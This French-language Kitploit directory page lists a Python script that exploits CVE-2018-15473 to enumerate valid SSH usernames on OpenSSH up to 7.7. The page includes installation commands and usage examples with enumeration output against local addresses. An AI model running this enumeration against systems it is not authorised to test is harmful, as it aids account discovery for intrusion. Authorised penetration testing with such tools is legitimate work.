Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2018-15473 — Script Python pour énumérer les noms d'utilisateur SSH valides en exploitant CVE-2018-15473, une vulnérabilité d'énumération d'utilisateurs dans OpenSSH jusqu'à la version 7.7. | Kitploit
Outils/GitHubGitHub/wh1t3fox/cve-2018-15473
ReconnaissanceAnalyse des VulnérabilitésExploitationCollecte d'InformationsSécurité RéseauTests d'Intrusion
GitHubwh1t3fox/cve-2018-15473

cve-2018-15473

Script Python pour énumérer les noms d'utilisateur SSH valides en exploitant CVE-2018-15473, une vulnérabilité d'énumération d'utilisateurs dans OpenSSH jusqu'à la version 7.7.

Voir le dépôt
3il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-15473

OpenSSH jusqu'à la version 7.7 est vulnérable à une énumération d'utilisateurs en raison du fait qu'il ne retarde pas l'abandon pour un utilisateur d'authentification invalide jusqu'à ce que le paquet contenant la demande ait été entièrement analysé, lié à auth2-gss.c, auth2-hostbased.c et auth2-pubkey.c.

Installation

Vous devrez peut-être installer le paquet openssl-dev équivalent de votre distribution

root@kitploit:~
# NOTE: if you're installing on kali, you can skip the pip install; paramiko is already there.  

git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt 
# - OR - 
pipenv install -r requirements.txt  # if you're cool like that   
chmod u+x ssh-username-enum.py

Exemples

Un seul nom d'utilisateur

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!

Utiliser une liste de mots avec 10 threads (par défaut 4)

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------

Adresse IPv6 sur le port 2222 et VERBOSITÉ ACCRUE !

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------
Télécharger l’outil